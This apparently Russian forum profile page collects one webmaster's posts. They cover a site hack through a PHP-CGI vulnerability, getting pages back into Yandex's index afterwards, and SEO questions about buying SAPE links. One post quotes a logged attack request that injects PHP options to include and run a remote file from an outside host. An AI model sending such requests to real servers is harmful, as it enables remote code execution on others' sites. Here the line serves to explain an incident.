DpoHro

Рейтинг
113
Регистрация
05.04.2008

В общем, исследовав проблему более детально, нашел ее корни.

Проблема в уязвимости PHP установленного у хостера.

А именно, если по-русски, то вот этой: http://www.opennet.ru/opennews/art.shtml?num=33765

В моем случае, все выглядело вот так:

GET /?-d%20allow_url_include%3don+-d%20auto_prepend_file%3dhttp://www.convoy.ru/css/imgs.txt%20-n HTTP/1.0

Уязвимость примитивна, залатана она будет как обещается в мае, однако когда позаботятся обновиться хостеры не известно.

Если ничего не предпринимать, сайт могут ломать хоть каждую секунду в автоматическом режиме.

---------- Добавлено 08.05.2012 в 02:41 ----------

dogmatek:
DpoHro, Хотел бы поинтересоваться по вопросу возврата страниц в индекс после взлома сайта. Насколько быстро проходит процесс по возврату страниц в индекс Яндекса вашего сайта и если писали в тех поддержку, то что ответили?
У меня вернулось на данный момент 10 страниц, и то это страницы с новыми материалами, которые добавляются в яндекс.новости. В техподдержке ответили через неделю, что позже сообщат причину обнуления показателей:

Вообщем ничего определенного.

Мне Платоны отписались что страницы вернуться в течение 2-3 недель.

Главное чтобы за этот период опять какаянибудь зараза не залезла на сайт.

Обидно что любой школьник такое мог сделать ((

dogmatek:
Такая же ситуация и у меня прозошла в Пасхальные дни. только через 3 дня смог перезалить данные на сервер. яндекс обнулил показатели сайта через 5 дней и досих пор не вернул.

Что значит обнулил у меня тиц на месте в выдаче вот сегодня ночью 10 страниц появилось, к утру исчезли уже.

Ты писал платонам? ответили нет?

У меня сейчас подобная ситуация, ТП хостинга в логах ФТП ничего не нашла ((

А вот я нашел файл с вредокодом и инклуд в одном из файлов движка. Код удалил инклуд тоже.

Заметил я его поздно был в командировке и не мог посещать сайт, и как раз эти 3 дня он и вредил моему сайту (((

Вредокод перенаправлял пользователей пришедших с поиска и других сайтов видимо кудато по своему усмотрению.

Весь трафик пошел в статистике с jindtesn_com

Спустя примерно 3-5 дней сайт пропал из яндекса ((

У меня конечно в тотале пароль от фтп сохранен, есть он у 3 человек, возможно троян покрал, но ТП заявляет что в этот период никто кроме меня с этим файлом ничего не делал (я его только удалил). Знать дырка, но тогда это враги. Узнать бы кто ...

Вредоскрипт в аттаче как расшифровать полностью? у меня только чатично получилось.

zip lnk.zip

Недавно видел 2 ответа сейчас один ))

Ясно, наверное да, на всякий случай буду с www покупать ))

erikz:
Уверенны, что САПА виновата, если правильно понял, Вы покупаете ссылки, а не размещаете.

Я не уверен, я предполагаю...

Я же топик создал для того чтобы разобраться что не так.

В начале года подавал на бесплатной, в ноябре подал уже на платной.

Сайту год отроду.

сайт

На сайте не размещаются какие-либо блоки контекстной рекламы, не размещаются блоки с сапы и др. ссылочных бирж, не размещаются ссылки на каталоги (и никаких прогонов по каталогам небыло).

Единственное, что есть - это каталог предприятий города со ссылками на их сайты в том числе, который построен несколько своеобразно, там есть блок с ключевыми фразами например, но таких описаний для фирм относительно мало.

Продвижение:

- покупка ссылок в сапе

- директ, бегун

А есть альтернатива сапе? Чтобы так сказать "и нашим и вашим"? полезно и для позиций в выдаче и не считалось спамом?

У меня сейчас на региональном сайте узкой тематики 250 посетителей в сутки, мне нужно точно не меньше. Они все практически идут с ПС, которые в свою очередь жуют ссылки сапы и им видимо вкусно, потому как по нужным мне запросам имею 1-5 позиции.

потерять их - значит лишиться трафика.

В том то и дело что я пока не очень понимаю что есть спам?

Хотя поползав в правилах Яндекса нашел:

3.5. «Поисковый спам» — это попытки обмана поисковой системы и манипулирования ее результатами с целью завышения позиции сайтов (страниц) в результатах поиска. Сайты, содержащие «поисковый спам», могут быть понижены при ранжировании или исключены из поиска Яндекса из-за невозможности их корректного ранжирования.

Мы не комментируем исключение сайтов из поиска и/или изменение их позиции, не предуведомляем о них и не даем никаких гарантий и сроков на повторное их включение в поиск.

Мы также не сообщаем исчерпывающий список методов спама, которые могут вызвать исключение сайта из поиска и/или изменение их позиции. Тем не менее, мы изложили наши взгляды на качественную и некачественную информацию в следующем документе: «Чем отличается качественный сайт от некачественного с точки зрения Яндекса?»

Я так понял, что это размещение ссылок в той же САПЕ.

Извиняюсь тогда тут "вилы".

У меня сайт должен висеть в топе, если его там не увидят клиенты месяцок, то зададутся резонным вопросом, а какой толк от рекламы на этом сайте?

С другой стороны, видимо есть резон попадания в каталог. Кстати какой? Что это даст? Может оно того и не стоит?

Всего: 145